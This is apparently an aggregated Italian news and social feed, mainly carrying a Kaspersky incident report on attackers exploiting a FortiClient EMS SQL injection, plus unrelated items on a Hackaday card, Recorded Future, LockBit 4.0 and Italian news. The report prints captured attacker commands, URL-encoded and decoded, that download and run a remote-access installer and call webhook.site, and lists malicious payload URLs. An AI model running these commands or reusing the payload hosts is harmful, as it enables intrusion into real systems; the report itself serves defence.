Salta al contenuto principale



#Occupazioni, il Ministro Giuseppe Valditara dichiara: "Chi rovina una scuola deve pagare".

Qui tutti i dettagli ▶️ mim.gov.it/web/guest/-/occupaz…



Attackers exploiting a patched FortiClient EMS vulnerability in the wild


28790036

Introduction


During a recent incident response, Kaspersky’s GERT team identified a set of TTPs and indicators linked to an attacker that infiltrated a company’s networks by targeting a Fortinet vulnerability for which a patch was already available.

This vulnerability is an improper filtering of SQL command input making the system susceptible to an SQL injection. It specifically affects Fortinet FortiClient EMS versions 7.0.1 to 7.0.10 and 7.2.0 to 7.2.2. When successfully exploited, this vulnerability allows attackers to execute unauthorized code or commands by sending specially crafted data packets.

The affected system was a Windows server exposed to the internet, with only two ports open. The targeted company employs this technology to allow employees to download specific policies to their corporate devices, granting them secure access to the Fortinet VPN.

Open ports exposed to the Internet
Open ports exposed to the Internet

Identification and containment


In October 2024, telemetry alerts from our MDR technology revealed attempts by an internal IP address to access registry hives via an admin account on a customer’s Windows server. The IP address where the requests originated was part of the customer’s network but it was not covered by the MDR solution according to the customer’s assessment. These attempts also targeted administrative shares, including the following.

  • \\192.168.X.X\C$\Users;
  • \\192.168.X.X\C$\;
  • \\192.168.X.X\IPC$\srvsvc;
  • \\192.168.X.X\IPC$\svcctl;
  • \\192.168.X.X \IPC$\winreg;
  • \\192.168.X.X \ADMIN$\SYSTEM32\WqgLtykM.tmp;
  • \\192.168.X.X \C$\Windows\System32\Microsoft\Protect\DPAPI Master Keys;
  • \\192.168.X.X \C$\Windows\System32\Microsoft\Protect\User Keys;
  • \\192.168.X.X \C$\Windows\System32\Microsoft\Protect\Protected Credentials.

Locally, on the machine with the compromised IP address, several attempts were made to dump the HKLM\SAM and HKLM\SECURITY registry hives via the Remote Registry service.
C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry
Evidence also confirmed multiple failed login attempts reported by Kaspersky MDR, which originated from the same internal IP address on multiple hosts that used an administrator account.

Analysis and initial vector


By collecting the evidence of the remote activities mentioned above from the source server, we confirmed that this server was exposed to the internet, with two open ports associated with FortiClient EMS. Filesystem artifacts confirmed the execution of remote monitoring and management (RMM) tools, such as ScreenConnect and AnyDesk. Given the use of the FortiClient EMS technology, it was confirmed that the installed version (7.01) was vulnerable to CVE-2023-48788, so it was necessary to get additional evidence from system logs to explore possible exploitation artifacts. Below are two key paths where the logs can be found.

  • FortiClient Log – C:\Program Files\Fortinet\FortiClientEMS\logs\*
    • Relevant files:
      • ems.log: This is the main log for FortiClient EMS. It can point to unusual behavior, database errors, unauthorized access or injection attempts.
      • sql_trace.log or similar logs: If this file is present, it may contain detailed information about SQL queries that have been run. This log can be reviewed for unexpected or malformed queries, which could indicate an attempt at SQL injection.



  • MS SQL – C:\Program Files\Microsoft SQL Server\MSSQL14.FCEMS\MSSQL\Log\*
    • These logs are associated with MS SQL Server as used by FortiClient EMS.


We were able to discover the evidence of an SQL injection that the attacker had successfully performed in one of the ERRORLOG files at the second path, C:\Program Files\Microsoft SQL Server\MSSQL14.FCEMS\MSSQL\Log\ERRORLOG.X.

Evidence of the CVE-2023-48788 exploitation
Evidence of the CVE-2023-48788 exploitation

By reviewing Kaspersky telemetry data associated with the same verdict, GERT experts were able to identify the commands executed by the attackers using a set of instructions contained in a Base64-encoded URL that matched the activities identified in the analyzed system.
Filename c:\program files\microsoft sql
server\mssql14.fcems\mssql\binn\sqlservr.exe
[19:40:10.147][2472][3268]PDMCreateProcess("$system32\cmd
.exe",""$system32\cmd.exe" /c POWERSHELL.EXE -COMMAND ""ADD-TYPE -ASSEMBLYNAME SYSTEM.WEB; CMD.EXE
/C
([SYSTEM.WEB.HTTPUTILITY]::URLDECODE("""%63%75%72%6C%20%2D%6F%20%43%3A%5C%75%7
0%64%61%74%65%2E%65%78%65%20%22%68%74%74%70%73%3A%2F%2F%69%6E%66%69%6E%69%74%7
9%2E%73%63%72%65%65%6E%63%6F%6E%6E%65%63%74%2E%63%6F%6D%2F%42%69%6E%2F%53%63%7
2%65%65%6E%43%6F%6E%6E%65%63%74%2E%43%6C%69%65%6E%74%53%65%74%75%70%2E%65%78%6
5%3F%65%3D%41%63%63%65%73%73%26%79%3D%47%75%65%73%74%22%20%26%20%73%74%61%72%7
4%20%2F%42%20%43%3A%5C%75%70%64%61%74%65%2E%65%78%65"""))"""
The decoded code is as follows.
curl -o C:\update.exe
"https://infinity.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe?e=Access
&y=Guest" & start /B C:\update.exe
The attackers took advantage of the curl command to download an installer for the ScreenConnect remote access application. We also observed the use of the Windows native binary
certutil for the same purpose. The installer would be stored as update.exe in the root of the C: drive, which would then be executed in the background. Judging by the y=Guest parameter in the URL query, the attackers seemingly relied on a ScreenConnect trial license.
We found that after the initial installation, the attackers began to upload additional payloads to the compromised system, to begin discovery and lateral movement activities, such as enumerating network resources, trying to obtain credentials, perform defense evasion techniques and generating a further type of persistence via the AnyDesk remote control tool. The payloads we discovered are provided in the table below.

Network Enumeration:
  • netscan.exe;
  • net;
  • net/dat.txt;
  • net/libsmb2.dll;
  • net/libsmi2.dll;
  • net/netscan.exe;
  • net/netscanold.xml;
  • net/unins000.dat;
  • net/unins000.exe.
Credential Theft:
  • webbrowserpassview.exe: a password recovery tool that reveals passwords stored in Internet Explorer (version 4.0 – 11.0), Mozilla Firefox (all versions), Google Chrome, Safari and Opera.
  • netpass64.exe: a password recovery tool.
  • mimikatz.exe
Defense Evasion:
The attackers leveraged the tool HRSword.exe (Huorong Internet Security) to perform defense evasion techniques.
Remote Control:
  • AnyDesk: this tool allows to access and control devices remotely.

After confirming the exploitation success, we managed to collect additional evidence. By analyzing AnyDesk logs, we managed to get an IP address used in the intrusion.

C:\ProgramData\AnyDesk\ad_svc.trace — AnyDesk connections
C:\ProgramData\AnyDesk\ad_svc.trace — AnyDesk connections

According to cyberthreat intelligence resources, this IP address belongs to the Russian region and has been flagged as part of a network linked to a malicious campaign that abused Cobalt Strike.

Analysis of telemetry data for similar threat-related cases


Our telemetry data revealed that threat actors have been targeting various companies and consistently altering ScreenConnect subdomains, seemingly changing them regardless of the specific target.

28790038

In addition to the above behavior, GERT experts spotted attempts to download and execute various payloads from additional unclassified external resources that had been used in other exploitation incidents. This strongly indicates that other attackers have been abusing the same vulnerability with a different second-stage payload aimed at multiple targets.

28790040

As for the regions and countries impacted by attempts to exploit this vulnerability with other payloads, we can confirm that this threat does not target specific locations, although we’ve observed a minor bias towards South America (5 out of 15 attacks).

Countries targeted by additional malicious payloads, April–November 2024 (download)

An ever-evolving “approach” to abusing the vulnerability in similar incidents


While further tracking this threat on October 23, 2024, GERT analysts detected active attempts to exploit CVE-2023-48788 in the wild by executing a similar command. At that point, the activity involved a free service provided by the webhook.site domain.
"C:\Windows\system32\cmd.exe" /c POWERSHELL.EXE -COMMAND ""ADD-
TYPE -ASSEMBLYNAME SYSTEM.WEB; CMD.EXE /C
([SYSTEM.WEB.HTTPUTILITY]::URLDECODE("""%70%6f%77%65%72%73%68%65%6
c%6c%20%2d%63%20%22%69%77%72%20%2d%55%72%69%20%68%74%74%70%73%3a%2
f%2f%77%65%62%68%6f%6f%6b%2e%73%69%74%65%2f%32%37%38%66%58%58%58%5
8%2d%63%61%33%62%2d[REDACTED]%2d%39%36%65%34%2d%58%58%58%58%34%35%
61%61%36%38%30%39%20%2d%4d%65%74%68%6f%64%20%50%6f%73%74%20%2d%42%
6f%64%79%20%27%74%65%73%74%27%20%3e%20%24%6e%75%6c%6c%22"""))""
When decoded, it turned out to be a command chain with a final PS1 command in it.
cmd.exe -> POWERSHELL.EXE -> CMD.exe -> powershell -c "iwr -Uri
hxxps://webhook.site/278fXXXX-ca3b-[REDACTED]-96e4-XXXX45aa6809 -Method Post -Body
'test' > $null"
According to information from webhook.site, the service “generates free, unique URLs and email addresses and lets you see everything that’s sent there instantly”. The uniqueness is guaranteed by a generated token included in the URL, email address or DNS domain. Users can enable the service for free or include additional services and features for a fee.

Webhook.site website
Webhook.site website

GERT experts confirmed that the threat actor was using this service to collect responses from vulnerable targets while performing a scan of the systems affected by the FortiClient EMS vulnerability. Knowing the specific webhook.site token used by the attackers, we were able to identify 25 requests to webhook.site during five hours on October 23. Of these, 22 originated from the distinct source IPs of vulnerable targets located in 18 different countries, and three more requests came from the same source, highlighted in red below.

28790042

Countries targeted by additional malicious activity on October 23, 2024 (download)

Three requests originated from the same IP address 135.XXX.XX.47 located in Germany and hosted by Hetzner Online GmbH. This IP has a bad reputation and was associated with an infostealer threat in October and November of last year, although we are not sure that this address has been abused by the threat actor or is part of their network. This host is showing open ports 80 and 7777 with an HTTP service on port 80 and an SSL service on port 7777.

A web interface for PRTG Network Monitor 24.1.92.1554 x64 is hosted on port 80 with what seems to be the default configuration and a PRTG Freeware trial license that expired on October 24, 2020.

PRTG Network Monitor enabled on the suspicious host
PRTG Network Monitor enabled on the suspicious host

The common name for the SSL certificate on port 7777 is WIN-LIVFRVQFMKO. Threat intelligence analysis has indicated that this host is known to be used frequently by various threat actors, among them the Conti and LockBit ransomware groups. However, it could also be a default Windows OS template hostname used by the hosting provider Hetzner.

SSL certificate on port 7777 of a suspicious host
SSL certificate on port 7777 of a suspicious host

Multiple successful attempts to access webhook.site and several suspicious variations discovered in the HTTP POST content led GERT analysts to believe that this host could be a “deprecated PRTG installation” compromised and controlled by the attacker in some way, and used to test the service provided by webhook.site.

Tactics, techniques and procedures


Below are the TTPs identified from our analysis and detections.

TacticTechniqueIDDetails
Initial AccessExploit Public-Facing ApplicationT1190Exploitation of FortiClient EMS for initial access.
Defense Evasion, Persistence, Privilege EscalationValid Accounts: Domain AccountsT1078.002Using accounts with administrator permissions to access via remote sessions, lateral movement and application execution.
Defense EvasionImpair Defenses: Disable or Modify ToolsT1562.001Various security applications were manipulated during interactive sessions.
ExecutionCommand and Scripting Interpreter: PowerShellT1059.001PowerShell was used to run the ConnectWise download and install commands.
Lateral MovementRemote ServicesT1021Lateral movements via RDP.
Command and ControlIngress tool transferT1105Transfer of files from the attacker to the environment through legitimate applications.
Lateral MovementLateral Tool TransferT1570Transferring applications to other systems in the environment via legitimate network services and compromised users.
Credential AccessCredentials from Password StoresT1555Using Mimikatz to harvest credentials from local storage.

Conclusion


The analysis of this incident helped us to establish that the techniques currently used by the attackers to deploy remote access tools are constantly being updated and growing in complexity. Although the vulnerability in question (CVE-2023-48788) had been patched by the time of the attacks, we suggest that multiple threat actors were able to exploit it, endangering a large number of users across various regions. That serves as a stark reminder of the need to constantly update technologies — to versions 7.0.11–7.0.13 or 7.2.3 and later in case of FortiClient EMS — that remain exposed to the internet, as this can serve as an initial vector for a cyberincident. Implementing alert notifications and patch management for any application with direct or indirect public access complements the regular update process.

In order to prevent and defend against attacks like these, we strongly recommend always installing an EPP agent on every host running an OS — even if it’s used with a specific role — and configuring additional controls like Application Control to block the execution of legitimate tools if abused by threat actors. It is worth pointing out that an MDR implementation on computers adjacent to the initial vector was able to detect and block attackers in a timely manner, preventing them from achieving their ultimate objectives or causing major impact within the victim’s environment. Also, installing agents that constantly monitor and detect threats on computers can be a key factor in containing the threat during an incident.

Indicators of Compromise

Applications/Filenames from the incident


C:\update.exe
HRSword.exe
Mimik!!!.exe
br.exe
donpapi.exe
netpass64.exe
webbrowserpassview.exe
netscan.exe
connectwise / ScreenConnect
AnyDesk

HASH – SHA1 from the incident


8cfd968741a7c8ec2dcbe0f5333674025e6be1dc
441a52f0112da187244eeec5b24a79f40cc17d47
746710470586076bb0757e0b3875de9c90202be2
bc29888042d03fe0ffb57fc116585e992a4fdb9b
73f8e5c17b49b9f2703fed59cc2be77239e904f7
841fff3a36d82c14b044da26967eb2a8f61175a8
34162aaf41c08f0de2f888728b7f4dc2a43b50ec
cf1ca6c7f818e72454c923fea7824a8f6930cb08
e3b6ea8c46fa831cec6f235a5cf48b38a4ae8d69
59e1322440b4601d614277fe9092902b6ca471c2
75ebd5bab5e2707d4533579a34d983b65af5ec7f
83cff3719c7799a3e27a567042e861106f33bb19
44b83dd83d189f19e54700a288035be8aa7c8672
8834f7ab3d4aa5fb14d851c7790e1a6812ea4ca8

Domains / IP addresses from the incident


45.141.84[.]45
infinity.screenconnect[.]com
kle.screenconnect[.]com
trembly.screenconnect[.]com
corsmich.screenconnect[.]com

Domains / IP addresses from additional malicious payloads discovered


185.216.70.170:1337
hxxps://sipaco2.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe?e=Access&y=Guest
hxxps://trembly.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe?e=Access&y=Guest
hxxps://corsmich.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe?e=Access&y=Guest
hxxps://myleka.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe?e=Access&y=Guest
hxxps://petit.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe?e=Access&y=Guest
hxxps://lindeman.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe?e=Access&y=Guest
hxxps://sorina.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe?e=Access&y=Guest
hxxps://kle.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe?e=Access&y=Guest
hxxps://infinity.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe?e=Access&y=Guest
hxxps://solarnyx2410150445.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe?e=Access&y=Guest
hxxps://allwebemails1.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe?e=Access&y=Guest
hxxps://web-r6hl0n.screenconnect.com/Bin/ScreenConnect.ClientSetup.exe?e=Access&y=Guest
hxxp://185.196.9.31:8080/bd7OZy3uMQL-YabI8FHeRw
HXXP://148.251.53.222:14443/SETUP.MSI
hxxps://webhook.site/7ece827e-d440-46fd-9b22-cc9a01db03c8
hxxps://webhook.site/d0f4440c-927c-460a-a543-50d4fc87c8a4
HXXP://185.216.70.170/OO.BAT
HXXP://185.216.70.170/HELLO
HXXP://185.216.70.170/A
hxxp://185.216.70.170
hxxp://185.216.70.170/oo.bat
hxxp://185.216.70.170/hello
hxxp://185.216.70.170/sos.txt
hxxp://185.216.70.170/72.bat
hxxp://206.206.77.33:8080/xeY_J7tYzjajqYj4MbtB0w
qvmlaztyjogwgkikmknv2ch3t5yhb6vw4.oast.fun
hxxp://5.61.59.201:8080/FlNOfGPkOL4qc_gYuWeEYQ %TEMP%\gfLQPbNLYYYh.exe
hxxp://5.61.59.201:8080/7k9XBvjahnQK09abSc8SpA %TEMP%\FaLNkAQGOe.exe
hxxp://5.61.59.201:8080/7k9XBvjahnQK09abSc8SpA %TEMP%\QgCNsJRB.exe
hxxps://www.lidahtoto2.com/assets/im.ps1
hxxp://87.120.125.55:8080/BW_qY1OFZRv7iNiY_nOTFQ %TEMP%\EdgouRkWzLsK.exe


securelist.com/patched-forticl…



Where This Xmas Card’s Going, We Don’t Need Batteries!


28790008

Energy harvesting, the practice of scavenging ambient electromagnetic fields, light, or other energy sources, is a fascinating subject that we don’t see enough of here at Hackaday. It’s pleasing then to see [Jeff Keacher]’s Christmas card: it’s a PCB that lights up some LEDs on a Christmas tree, using 2.4 GHz radiation, and ambient light.

The light sensors are a set of LEDs, but the interesting part lies in the RF harvesting circuit. There’s a PCB antenna, a matching network, and then a voltage multiplier using dome RF Schottky diodes. These in turn charge a supercapacitor, but if there’s not enough light a USB power source can also be hooked up. All of this drives a PIC microcontroller, which drives the LEDs.

Why a microcontroller, you ask? This card has an interesting trick up its sleeve, despite having no WiFi of its own, it can be controlled over WiFi. If the 2.4 GHz source comes via proximity to an access point, there’s a web page that can be visited with a script generating packets in bursts that produce a serial pulse train on the DC from the power harvester. The microcontroller can see this, and it works as a remote. This is in our view, next-level.


hackaday.com/2024/12/19/where-…



Russia etichetta Recorded Future come “Indesiderabile”: un vanto per il CEO


Recentemente, il governo russo ha preso una decisione che ha che ha suscitato grande attenzione a livello internazionale: ha etichettato ufficialmente la compagnia di intelligence sulle minacce informatiche (CTI) Recorded Future come “indesiderabile”. Per l’azienda, questa etichetta non è un castigo, ma piuttosto un segno di onore, come sottolineato dallo stesso CEO, Christopher Ahlberg.

L’etichetta di “indesiderabile” è una terminologia ufficiale adottata dalla Russia per sanzionare enti che non rientrano nei suoi favori, impedendo loro di operare nel paese o interagire con aziende e individui russi. Introdotta nel 2015, questa misura ha lo scopo di limitare l’influenza di organizzazioni non governative (ONG), media e altri membri della società civile che mettono in luce le violazioni dei diritti umani e criticano il regime di Vladimir Putin, noto per il suo autoritarismo.

Recorded Future è la prima organizzazione di sicurezza informatica a ricevere questa nomina, e una delle poche aziende a “guadagnarsela”. Tuttavia, l’ufficio del Procuratore Generale della Federazione Russa ha erroneamente etichettato l’azienda come un’ONG, nel suo annuncio del 18 dicembre riguardo alla “designazione indesiderabile”. Tra le presunte colpe che hanno portato a questa decisione ci sono: il finanziamento da parte di aziende americane, la fornitura di servizi di ricerca, elaborazione e analisi di dati, inclusi quelli provenienti dal Dark Web, la “specializzazione nelle minacce informatiche” e l’interazione attiva con la CIA e altri servizi di intelligence stranieri.

Inoltre, il Procuratore Generale ha accusato Recorded Future di diffondere “propaganda” e di essere coinvolta in “campagne informative offensive” riguardo alla guerra in Ucraina, monitorando le attività dell’esercito russo e alimentando le autorità ucraine con informazioni riservate.

Nonostante le accuse, Christopher Ahlberg ha reagito positivamente alla notizia, postando su X: “Alcune cose nella vita sono complimenti rari. Questa lo è.
28789985
Questa mossa da parte della Russia arriva in un momento in cui Recorded Future sta per essere acquisita da Mastercard per 2,65 miliardi di dollari, dimostrando ancora una volta l’importanza strategica dell’azienda nel panorama globale della cyber security. La decisione del governo russo di etichettarla come indesiderabile non fa che evidenziare il peso e la rilevanza che l’azienda ha acquisito nel monitoraggio delle minacce informatiche globali e nella lotta contro la disinformazione.

L'articolo Russia etichetta Recorded Future come “Indesiderabile”: un vanto per il CEO proviene da il blog della sicurezza informatica.



In Italia a novembre 2024 aumentate vittime e incidenti cyber. Il report mensile del CSIRT


@Informatica (Italy e non Italy 😁)
Rispetto a ottobre, novembre ha registrato un incremento di eventi e incidenti informatici avvenuti in Italia. Lo rivela il report di novembre del sesto Operational Summary pubblicato dal CSIRT-Italia, l’articolazione tecnico-operativa

in reply to Cybersecurity & cyberwarfare

che dire: forse mancano le competenze dopo aver formato i giovani che poi scappano all’estero per una paga degna? Colpa di chi secondo voi?
in reply to Julian Del Vecchio

@Julian Del Vecchio il comparto IT negli enti pubblici nelle più grandi aziende pubbliche e private che non si occupano di IT è in mano a boiardi di stato, ex FdO o magistrati, ex imprenditori o vecchi arnesi selezionati dalla massoneria, opus dei o comunione e liberazione.

Nei paesi "normali" i direttori IT meno competenti sono almeno ingegneri meccanici o fisici con esperienza diretta nel mondo della cybersecurity.

Questo è il problema



Si chiamava Giovanni Battista Macciò l’operaio della Culmv morto schiacciato la scorsa notte nel porto di Genova mentre lavorava: un’altra vittima sacrificata al primato del profitto
Non si parli di nuovo di fatale incidente o di non rispetto delle procedure di sicurezza che sono tali solo se reggono in qualsiasi condizione; se non lo fanno, non sono tali e non possono essere usate come scusante, il tappeto sotto cui nascondere turni e doppi turni, cottimi e precarietà, uniti a controlli insufficienti e mancati investimenti sulla sicurezza.
La verità è che anche questa tragica morte è figlia della ricerca del massimo di sfruttamento col minimo dei costi: si sono deregolamentate e privatizzate le banchine, si è spezzettata la gestione del lavoro, si impongono turni e carichi di lavoro che di per sé producono insicurezza e rischi continui per la vita dei lavoratori.
Ora siamo al film già visto della sequela di messaggi di cordoglio farisaici che non durano lo spazio di una giornata; che nel loro susseguirsi nel corso dell’anno senza che nulla cambi davvero, invece che suscitare rabbia e mobiitazione durature contro il sacrificio di vittime sull’altare del profitto, finiscono per produrre un’assuefazione che fa il gioco di politici e governi che il cambiamento non lo vogliono.
Nel dichiarare i nostro più completo sostegno al giusto sciopero dei portuali, alla loro lotta per un lavoro garantito e sicuro, non possiamo non ribadire la necessità di controlli che facciano rispettare le leggi sulla sicurezza esistenti e l’attuazione di nuove norme a partire dall’introduzione nel codice penale del reato di omicidio sul lavoro.
Rifondazione Comunista si stringe attorno alla famiglia e ai colleghi di lavoro di GB Macciò e dell’altro lavoratore rimasto ferito, per il quale auguriamo una rapida guarigione.

Antonello Patta, responsabile nazionale lavoro
Gianni Ferretti, segretario della federazione di Genova
Partito della Rifondazione Comunista/Sinistra Europea



CARABINIERI CINOFILI IN IRAQ


Immagine/foto

In questi giorni, alcuni Carabinieri del Centro Cinofili di Firenze sono impegnati in Iraq in una attività formativa a favore della Direzione Anti Narcotici e Sostante Psicoattive del Ministero dell'Interno iracheno, nell'ambito del progetto EU-ACT finanziato dall'Unione Europea.

EU-ACT 2 è un progetto di cooperazione che fornisce sostegno ai paesi terzi nella lotta alla criminalità organizzata, migliorando le loro capacità di affrontare le minacce dal punto di vista dello stato di diritto. Questa iniziativa fa parte del Programma dell’UE per contrastare i flussi illeciti globali (GIFP). Con un budget di 13 milioni di euro, attivo da giugno 2023 a maggio 2027, il progetto è finanziato dalla Commissione Europea attraverso il Servizio per gli Strumenti di Politica Estera (FPI) ed è realizzato attraverso la collaborazione tra FIIAPP (Spagna), CIVIPOL (Francia) e l'Arma dei Carabinieri (Italia).

L’obiettivo dell’UE-ACT 2 intende contribuire alla lotta contro la criminalità organizzata e il traffico illecito lungo le “rotte dell’eroina” dall’Afghanistan all’Europa, concentrandosi su aree geografiche critiche come l’Asia meridionale e centrale, l’Africa orientale, il Caucaso e il Medio Oriente. L’intervento è inoltre in linea con i piani operativi di Europol, con particolare attenzione all’alta reti criminali a rischio (HRCN) e traffico di stupefacenti come l’eroina e le nuove droghe sintetiche (SYD-NPS).

Gli esperti del progetto agiscono per rafforzare le capacità delle autorità di polizia e giudiziarie dei paesi beneficiari nella conduzione di operazioni e indagini congiunte, migliorare le competenze nel perseguire i casi di criminalità organizzata,
e promuovere una cooperazione transnazionale più efficace tra le autorità competenti, in linea con gli standard internazionali e i diritti umani.

Immagine/foto

Il Centro Carabinieri Cinofili, con sede in Firenze, è stato istituito l’8 novembre 1957 con il compito di assicurare l’addestramento del personale e dei quadrupedi in forza al Servizio Cinofili dell’Arma, per il loro impiego nei servizi preventivi e in operazioni di polizia giudiziaria, di ricerca e di soccorso. Svolge, inoltre, funzioni di indirizzo tecnico-addestrativo a favore di tutte le unità cinofile dell’organizzazione territoriale/forestale, attività di sperimentazione di nuove razze canine, di metodologie addestrative e di materiali di equipaggiamento, nonché la formazione di personale delle forze armate e di polizia, nazionali e straniere, che ne facciano richiesta.

#ArmadeiCarabinieri #iraq #carabiniericinofili #EU-ACT #europol

@Notizie dall'Italia e dal mondo

Questa voce è stata modificata (8 mesi fa)


LockBit 4.0: Il nuovo ransomware apre le porte a chiunque sia disposto a pagare


Il gruppo LockBit, una delle organizzazioni di cybercriminali più temute e attive nel panorama degli attacchi ransomware, ha ufficialmente lanciato la sua ultima versione: LockBit 4.0. Questo nuovo aggiornamento rappresenta una tappa evolutiva importante rispetto al precedente LockBit 3.0, conosciuto anche come LockBit Black, che già aveva guadagnato notorietà per la sua capacità di infliggere danni considerevoli a organizzazioni e aziende di ogni dimensione e settore.

LockBit 4.0 introduce una serie di nuove funzionalità avanzate, abbinate a una strategia di reclutamento che rompe con le pratiche passate, offrendo l’accesso a chiunque sia disposto a pagare una somma modesta. Questa mossa potrebbe avere implicazioni devastanti per la sicurezza informatica globale e apre un nuovo capitolo nel mondo dei ransomware.

I dettagli del rilascio di LockBit 4.0

28777046
Il messaggio promozionale con cui è stato annunciato LockBit 4.0 è tanto provocatorio quanto inquietante. Con un linguaggio sfacciato e provocativo, il gruppo si rivolge direttamente a coloro che potrebbero essere attratti dalla promessa di ricchezza e successo facile:

“Vuoi una Lamborghini, una Ferrari e tante ragazze? Iscriviti e inizia il tuo viaggio da pentester miliardario in 5 minuti con noi.”


28777048
Questa retorica, che richiama stereotipi di lusso e uno stile di vita sfarzoso, è chiaramente progettata per ammaliare e sedurre nuovi affiliati, soprattutto giovani attratti da guadagni rapidi e dall’idea di fama nel mondo underground dell’hacking.

Il processo di registrazione semplificato: accesso a pagamento con BTC o XMR


Il nuovo approccio di LockBit 4.0 è sorprendentemente aperto e inclusivo. La piattaforma mette a disposizione una schermata di login minimalista e funzionale, dove gli utenti possono registrarsi con pochi passaggi semplici. Per accedere, è necessario inserire un nome utente, una password e risolvere un captcha di verifica.
28777050
Questa procedura di accesso è supportata da due metodi di pagamento principali:

  1. Bitcoin (BTC) – La criptovaluta più diffusa e utilizzata per le transazioni nel dark web.
  2. Monero (XMR) – Una criptovaluta nota per l’elevato livello di anonimato, che rende le transazioni ancora più difficili da tracciare rispetto a Bitcoin.

Questa duplice opzione di pagamento offre maggiore flessibilità agli aspiranti affiliati e sottolinea l’attenzione del gruppo LockBit per garantire l’anonimato e la sicurezza delle transazioni.

Il costo di accesso: 777 USD in Bitcoin


Per accedere alla piattaforma LockBit 4.0 e ottenere il pieno controllo del ransomware, è richiesto il pagamento di una somma pari a 0,007653 BTC, equivalente a circa 777 USD. Le istruzioni fornite indicano di inviare l’importo all’indirizzo Bitcoin dedicato.
28777052
Il messaggio avverte chiaramente che il pagamento deve essere pari o superiore all’importo specificato, altrimenti la registrazione sarà annullata. Viene anche consigliato l’uso di un cryptocurrency mixer per rendere le transazioni meno tracciabili e mantenere l’anonimato.

Stato attuale del wallet Bitcoin: nessun pagamento ricevuto


Nonostante l’annuncio roboante e l’apertura a nuovi affiliati, al momento l’indirizzo Bitcoin fornito per il pagamento non mostra ancora alcuna transazione. Il saldo confermato e non confermato è infatti pari a 0 BTC (0 USD), come evidenziato nella seguente schermata:
28777054
Questa mancanza di attività potrebbe indicare:

  1. Scetticismo iniziale da parte dei potenziali affiliati, che potrebbero voler attendere ulteriori prove di successo prima di investire.
  2. Paura di monitoraggio da parte delle forze dell’ordine, che spesso tengono sotto osservazione questi indirizzi Bitcoin.
  3. Cautela da parte di chi è interessato ma preferisce utilizzare Monero per garantire un livello di anonimato più elevato.


Cosa offre la piattaforma di LockBit 4.0?


Una volta effettuato il pagamento e completata la registrazione, gli utenti ottengono immediatamente l’accesso al pannello di controllo del ransomware. Da questa piattaforma è possibile:

  • Creare build personalizzate del ransomware per sistemi Windows, ESXi e Linux.
  • Gestire campagne di attacchi ransomware in modo organizzato e automatizzato.
  • Comunicare con le vittime per negoziare il riscatto e gestire le richieste di pagamento.
  • Scaricare strumenti di crittografia avanzati per bloccare i sistemi delle vittime in modo rapido ed efficiente.


Un cambio di approccio radicale: la democratizzazione del cybercrimine


L’apertura di LockBit 4.0 a chiunque sia disposto a pagare rappresenta un cambiamento radicale nel modello di business dei ransomware. In passato, l’accesso a strumenti così avanzati era riservato a pochi affiliati selezionati e fidati. Ora, con una somma accessibile di 777 USD, chiunque con una conoscenza informatica di base può accedere a strumenti potenti e dannosi.

Questa strategia di democratizzazione del cybercrimine porta con sé implicazioni devastanti:

  1. Esplosione degli attacchi ransomware: Un numero maggiore di attori malevoli potrebbe lanciare attacchi, colpendo aziende e organizzazioni di ogni dimensione.
  2. Maggiore imprevedibilità e caos: La facilità di accesso significa che anche hacker meno esperti potrebbero scatenare attacchi maldestri ma comunque devastanti.
  3. Sovraccarico delle infrastrutture di sicurezza: Con un incremento esponenziale degli attacchi, le aziende potrebbero non riuscire a difendersi adeguatamente.


Un monito ai giovani attratti dal cybercrimine


L’annuncio di LockBit 4.0 può sembrare allettante, soprattutto per i giovani affascinati dalla promessa di denaro facile e successo immediato. Tuttavia, è fondamentale ricordare che entrare nel mondo del cybercrimine è illegale e comporta rischi enormi.

Attività come il lancio di ransomware, l’accesso non autorizzato a sistemi informatici e l’estorsione costituiscono reati gravi, tra cui:

  • Frode informatica
  • Sostituzione di persona
  • Estorsione
  • Accesso abusivo a sistema informatico (punito dall’art. 615 ter del Codice Penale con la reclusione fino a tre anni)

Anche atti apparentemente innocui, come curiosare nei sistemi altrui per dimostrare le proprie competenze, sono illegali e possono avere conseguenze devastanti sulla vita personale e professionale.

Esistono percorsi legali e stimolanti nel mondo della cybersecurity. Le competenze informatiche possono essere impiegate per difendere aziende e istituzioni, proteggere dati sensibili e contrastare i cybercriminali. Scegliere la strada della legalità e dell’etica offre soddisfazioni personali e professionali durature, contribuendo a un mondo digitale più sicuro per tutti.

Sfrutta le tue capacità per creare, proteggere e innovare. La tua abilità può fare la differenza, ma solo se usata con responsabilità.

L'articolo LockBit 4.0: Il nuovo ransomware apre le porte a chiunque sia disposto a pagare proviene da il blog della sicurezza informatica.



CILE. La multinazionale mineraria condannata per danni ambientali


@Notizie dall'Italia e dal mondo
Pagine Esteri, 19 dicembre 2024. La BHP Billiton è la più grande società mineraria al mondo. Nata dalla fusione tra una impresa inglese e una australiana, gestisce in Cile diverse miniere, una delle quali, la Minera Escondida Ldta, si trova nel nord del Paese. Mercoledì 18



Human Rights Watch: Israele commette un genocidio negando l’acqua ai civili di Gaza


@Notizie dall'Italia e dal mondo
Dall'ottobre 2023, afferma HRW, le autorità israeliane hanno deliberatamente impedito ai palestinesi di Gaza di accedere alla quantità adeguata di acqua necessaria alla sopravvivenza
L'articolo Human Rights Watch: Israele commette un



Israele bombarba con forza lo Yemen, almeno 10 i morti


@Notizie dall'Italia e dal mondo
I raid hanno colpito Hodeidah e altri due porti yemeniti facendo morti e feriti. Bombe anche su due centrali elettriche a Sanaa. Israele sostiene di aver risposto agli attacchi degli Houthi con missili e droni
L'articolo Israele bombarba con forza lo Yemen, almeno 10 i morti proviene da Pagine



Volete prenotare un volo Ryanair? Preparatevi a una scansione del viso!
Ryanair obbliga i nuovi clienti a creare un account. Inoltre, devono sottoporsi a un processo di verifica obbligatorio che può comportare il riconoscimento facciale.
mickey19 December 2024
